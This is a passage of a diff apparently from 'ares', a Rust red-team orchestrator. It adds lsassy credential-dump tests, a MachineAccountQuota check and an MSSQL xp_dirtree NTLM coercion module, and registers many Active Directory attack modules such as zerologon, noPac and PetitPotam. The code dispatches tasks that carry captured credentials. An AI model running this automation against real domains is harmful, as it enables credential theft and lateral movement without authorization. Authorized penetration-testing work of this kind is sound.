+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].host_ip, "192.168.58.30");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "lsassy:192.168.58.30");
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_LSASSY_DUMP, "lsassy:192.168.58.30".into());
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_admin_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ // Only admin cred from different domain + quarantine the matching one
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ state.credentials.push(make_admin_credential(
+ "domadmin",
+ "Admin!1",
+ "fabrikam.local",
+ )); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "domadmin");
+ assert!(work[0].credential.is_admin);
+ }
+
+ #[test]
+ fn collect_bare_hostname_matches_any_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_owned_host("192.168.58.30", "ws01"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_owned_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.31", "srv02.fabrikam.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped_with_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("gooduser", "Pass!456", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_lsassy_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "gooduser");
+ }
+
+ #[test]
+ fn collect_skips_empty_password_credentials() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_owned_host("192.168.58.30", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("nopw", "", "contoso.local"));
+ let work = collect_lsassy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("lsassy:{}", "192.168.58.22");
+ assert_eq!(key, "lsassy:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_LSASSY_DUMP, "lsassy_dump");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "dc01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "dc01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "lsassy_dump",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "lsassy_dump");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = LsassyWork {
+ dedup_key: "lsassy:192.168.58.22".into(),
+ host_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+
+ assert_eq!(work.dedup_key, "lsassy:192.168.58.22");
+ assert_eq!(work.host_ip, "192.168.58.22");
+ assert_eq!(work.hostname, "srv01.contoso.local");
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.credential.username, "testuser");
+ }
+
+ #[test]
+ fn domain_extraction_from_fabrikam() {
+ let hostname = "sql01.fabrikam.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn dedup_key_with_various_ips() {
+ let ips = ["192.168.58.10", "192.168.58.240", "192.168.58.1"];
+ for ip in &ips {
+ let key = format!("lsassy:{ip}");
+ assert!(key.starts_with("lsassy:"));
+ assert!(key.ends_with(ip));
+ }
+ }
+
+ #[test]
+ fn credential_preference_admin_flag() {
+ let admin_cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "domainadmin".into(),
+ password: "AdminPass!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: true,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let regular_cred = ares_core::models::Credential {
+ id: "c2".into(),
+ username: "user1".into(),
+ password: "UserPass!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let creds = [regular_cred, admin_cred];
+ // Fallback logic: find admin credential
+ let admin = creds.iter().find(|c| c.is_admin && !c.password.is_empty());
+ assert!(admin.is_some());
+ assert_eq!(admin.unwrap().username, "domainadmin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/machine_account_quota.rs b/ares-cli/src/orchestrator/automation/machine_account_quota.rs
new file mode 100644
index 00000000..7c4b5a2e
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/machine_account_quota.rs
@@ -0,0 +1,342 @@
+//! auto_machine_account_quota -- check MachineAccountQuota (MAQ) per domain.
+//!
+//! The default MAQ of 10 allows any authenticated user to create computer
+//! accounts. This is a prerequisite for noPac (CVE-2021-42287) and RBCD
+//! attacks. If MAQ > 0, downstream modules can proceed with machine account
+//! creation-based attacks.
+//!
+//! Dispatches a recon check per domain to query the ms-DS-MachineAccountQuota
+//! attribute from the domain root.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect MAQ work items from state (pure logic, no async).
+fn collect_maq_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("maq:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(MaqWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks MAQ setting per domain via LDAP query.
+/// Interval: 45s.
+pub async fn auto_machine_account_quota(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("machine_account_quota") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_maq_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "machine_account_quota_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("machine_account_quota");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "MachineAccountQuota check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(
+ &dispatcher.queue,
+ DEDUP_MACHINE_ACCOUNT_QUOTA,
+ &item.dedup_key,
+ )
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "MAQ check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch MAQ check");
+ }
+ }
+ }
+ }
+}
+
+struct MaqWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("maq:{}", "contoso.local");
+ assert_eq!(key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_MACHINE_ACCOUNT_QUOTA, "machine_account_quota");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "machine_account_quota_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "machine_account_quota_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = MaqWork {
+ dedup_key: "maq:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("maq:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "maq:contoso.local");
+ }
+
+ // --- collect_maq_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "maq:contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_MACHINE_ACCOUNT_QUOTA, "maq:contoso.local".into());
+ let work = collect_maq_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred available, should fall back to first
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn collect_case_insensitive_domain_match() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_maq_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "maq:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("maq:{}", "contoso.local");
+ let key2 = format!("maq:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/mod.rs b/ares-cli/src/orchestrator/automation/mod.rs
index bb8cfd3a..5141a35d 100644
--- a/ares-cli/src/orchestrator/automation/mod.rs
+++ b/ares-cli/src/orchestrator/automation/mod.rs
@@ -13,59 +13,130 @@
//! all threading hacks since tokio tasks are truly concurrent.
mod acl;
+mod acl_discovery;
mod adcs;
mod adcs_exploitation;
mod bloodhound;
+mod certifried;
+mod certipy_auth;
mod coercion;
mod crack;
mod credential_access;
mod credential_expansion;
mod credential_reuse;
+mod cross_forest_enum;
+mod dacl_abuse;
mod delegation;
+mod dfs_coercion;
+mod dns_enum;
+mod domain_user_enum;
+mod foreign_group_enum;
mod gmsa;
+mod golden_cert;
mod golden_ticket;
mod gpo;
+mod gpp_sysvol;
+mod group_enumeration;
+mod krbrelayup;
mod laps;
+mod ldap_signing;
+mod localuser_spray;
+mod lsassy_dump;
+mod machine_account_quota;
mod mssql;
+mod mssql_coercion;
mod mssql_exploitation;
+mod nopac;
+mod ntlm_relay;
+mod ntlmv1_downgrade;
+mod password_policy;
+mod petitpotam_unauth;
+mod print_nightmare;
+mod pth_spray;
mod rbcd;
+mod rdp_lateral;
mod refresh;
mod s4u;
+mod searchconnector_coercion;
mod secretsdump;
mod shadow_credentials;
+mod share_coercion;
mod share_enum;
mod shares;
+mod sid_enumeration;
+mod smb_signing;
+mod smbclient_enum;
+mod spooler_check;
mod stall_detection;
mod trust;
mod unconstrained;
+mod webdav_detection;
+mod winrm_lateral;
+mod zerologon;
// Re-export all public task functions at the same paths they had before the split.
pub use acl::auto_acl_chain_follow;
+pub use acl_discovery::auto_acl_discovery;
pub use adcs::auto_adcs_enumeration;
pub use adcs_exploitation::auto_adcs_exploitation;
+pub(crate) use adcs_exploitation::EXPLOITABLE_ESC_TYPES;
pub use bloodhound::auto_bloodhound;
+pub use certifried::auto_certifried;
+pub use certipy_auth::auto_certipy_auth;
pub use coercion::auto_coercion;
pub use crack::auto_crack_dispatch;
pub use credential_access::auto_credential_access;
pub use credential_expansion::auto_credential_expansion;
pub use credential_reuse::auto_credential_reuse;
+pub use cross_forest_enum::auto_cross_forest_enum;
+pub use dacl_abuse::auto_dacl_abuse;
pub use delegation::auto_delegation_enumeration;
+pub use dfs_coercion::auto_dfs_coercion;
+pub use dns_enum::auto_dns_enum;
+pub use domain_user_enum::auto_domain_user_enum;
+pub use foreign_group_enum::auto_foreign_group_enum;
pub use gmsa::auto_gmsa_extraction;
+pub use golden_cert::auto_golden_cert;
pub use golden_ticket::auto_golden_ticket;
pub use gpo::auto_gpo_abuse;
+pub use gpp_sysvol::auto_gpp_sysvol;
+pub use group_enumeration::auto_group_enumeration;
+pub use krbrelayup::auto_krbrelayup;
pub use laps::auto_laps_extraction;
+pub use ldap_signing::auto_ldap_signing;
+pub use localuser_spray::auto_localuser_spray;
+pub use lsassy_dump::auto_lsassy_dump;
+pub use machine_account_quota::auto_machine_account_quota;
pub use mssql::auto_mssql_detection;
+pub use mssql_coercion::auto_mssql_coercion;
pub use mssql_exploitation::auto_mssql_exploitation;
+pub use nopac::auto_nopac;
+pub use ntlm_relay::auto_ntlm_relay;
+pub use ntlmv1_downgrade::auto_ntlmv1_downgrade;
+pub use password_policy::auto_password_policy;
+pub use petitpotam_unauth::auto_petitpotam_unauth;
+pub use print_nightmare::auto_print_nightmare;
+pub use pth_spray::auto_pth_spray;
pub use rbcd::auto_rbcd_exploitation;
+pub use rdp_lateral::auto_rdp_lateral;
pub use refresh::state_refresh;
pub use s4u::auto_s4u_exploitation;
+pub use searchconnector_coercion::auto_searchconnector_coercion;
pub use secretsdump::auto_local_admin_secretsdump;
pub use shadow_credentials::auto_shadow_credentials;
+pub use share_coercion::auto_share_coercion;
pub use share_enum::auto_share_enumeration;
pub use shares::auto_share_spider;
+pub use sid_enumeration::auto_sid_enumeration;
+pub use smb_signing::auto_smb_signing_detection;
+pub use smbclient_enum::auto_smbclient_enum;
+pub use spooler_check::auto_spooler_check;
pub use stall_detection::auto_stall_detection;
pub use trust::auto_trust_follow;
pub use unconstrained::auto_unconstrained_exploitation;
+pub use webdav_detection::auto_webdav_detection;
+pub use winrm_lateral::auto_winrm_lateral;
+pub use zerologon::auto_zerologon;
pub(crate) fn crack_dedup_key(hash: &ares_core::models::Hash) -> String {
let prefix = &hash.hash_value[..32.min(hash.hash_value.len())];
diff --git a/ares-cli/src/orchestrator/automation/mssql_coercion.rs b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
new file mode 100644
index 00000000..a9e9fbfa
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/mssql_coercion.rs
@@ -0,0 +1,698 @@
+//! auto_mssql_coercion -- coerce NTLM authentication from MSSQL servers via
+//! xp_dirtree/xp_fileexist.
+//!
+//! When we have MSSQL access (discovered by `auto_mssql_detection`) and a
+//! listener IP, we can force the SQL Server service account to authenticate
+//! back to our listener, capturing its NTLMv2 hash for cracking or relay.
+//!
+//! This is distinct from the general `auto_coercion` module which uses
+//! PetitPotam/PrinterBug against DCs.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Monitors for MSSQL servers and dispatches xp_dirtree NTLM coercion.
+/// Interval: 45s.
+pub async fn auto_mssql_coercion(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("mssql_coercion") {
+ continue;
+ }
+
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => continue,
+ };
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_mssql_coercion_work(&state, &listener)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "mssql_ntlm_coercion",
+ "target_ip": item.target_ip,
+ "listener_ip": item.listener,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("mssql_coercion");
+ match dispatcher
+ .throttled_submit("coercion", "coercion", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ "MSSQL xp_dirtree NTLM coercion dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_MSSQL_COERCION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_COERCION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "MSSQL coercion task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch MSSQL coercion");
+ }
+ }
+ }
+ }
+}
+
+/// Collect MSSQL coercion work items from the current state.
+///
+/// Extracted from the async loop so it can be unit-tested without a
+/// `Dispatcher` or real async runtime scaffolding.
+fn collect_mssql_coercion_work(
+ state: &crate::orchestrator::state::StateInner,
+ listener: &str,
+) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for vuln in state.discovered_vulnerabilities.values() {
+ if vuln.vuln_type.to_lowercase() != "mssql_access" {
+ continue;
+ }
+
+ let target_ip = vuln
+ .details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or(&vuln.target);
+
+ if target_ip.is_empty() {
+ continue;
+ }
+
+ let dedup_key = format!("mssql_coerce:{target_ip}");
+ if state.is_processed(DEDUP_MSSQL_COERCION, &dedup_key) {
+ continue;
+ }
+
+ let domain = vuln
+ .details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(MssqlCoercionWork {
+ dedup_key,
+ target_ip: target_ip.to_string(),
+ listener: listener.to_string(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+struct MssqlCoercionWork {
+ dedup_key: String,
+ target_ip: String,
+ listener: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("mssql_coerce:{}", "192.168.58.22");
+ assert_eq!(key, "mssql_coerce:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_MSSQL_COERCION, "mssql_coercion");
+ }
+
+ #[test]
+ fn mssql_access_vuln_type_matching() {
+ assert_eq!("mssql_access".to_lowercase(), "mssql_access");
+ assert_ne!("smb_signing_disabled".to_lowercase(), "mssql_access");
+ }
+
+ #[test]
+ fn target_ip_from_vuln_details() {
+ let details = serde_json::json!({"target_ip": "192.168.58.22"});
+ let target = details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or("fallback");
+ assert_eq!(target, "192.168.58.22");
+ }
+
+ #[test]
+ fn target_ip_fallback_to_vuln_target() {
+ let details = serde_json::json!({});
+ let fallback = "192.168.58.10";
+ let target = details
+ .get("target_ip")
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.10");
+ }
+
+ #[test]
+ fn credential_domain_matching() {
+ let domain = "contoso.local".to_string();
+ let cred_domain = "CONTOSO.LOCAL";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(matches);
+ }
+
+ #[test]
+ fn credential_domain_empty_no_match() {
+ let domain = "".to_string();
+ let cred_domain = "contoso.local";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(!matches);
+ }
+
+ #[test]
+ fn mssql_coercion_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "mssql_ntlm_coercion",
+ "target_ip": "192.168.58.22",
+ "listener_ip": "192.168.58.100",
+ "credential": {
+ "username": "sa",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "mssql_ntlm_coercion");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["listener_ip"], "192.168.58.100");
+ assert_eq!(payload["credential"]["username"], "sa");
+ }
+
+ #[test]
+ fn domain_extraction_from_vuln() {
+ let details = serde_json::json!({"domain": "contoso.local"});
+ let domain = details
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(domain, "contoso.local");
+
+ let details2 = serde_json::json!({});
+ let domain2 = details2
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(domain2, "");
+ }
+
+ #[test]
+ fn mssql_coercion_work_fields() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "sa".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = MssqlCoercionWork {
+ dedup_key: "mssql_coerce:192.168.58.22".into(),
+ target_ip: "192.168.58.22".into(),
+ listener: "192.168.58.100".into(),
+ credential: cred,
+ };
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.listener, "192.168.58.100");
+ }
+
+ // --- collect_mssql_coercion_work integration tests ---
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_cred(user: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{user}"),
+ username: user.into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_vuln(
+ id: &str,
+ vuln_type: &str,
+ target: &str,
+ details: serde_json::Value,
+ ) -> ares_core::models::VulnerabilityInfo {
+ let details_map: std::collections::HashMap =
+ serde_json::from_value(details).unwrap_or_default();
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.into(),
+ vuln_type: vuln_type.into(),
+ target: target.into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: details_map,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_nothing() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_mssql_coercion_work(&state, "192.168.58.100");
+ assert!(work.is_empty());
+ }
+
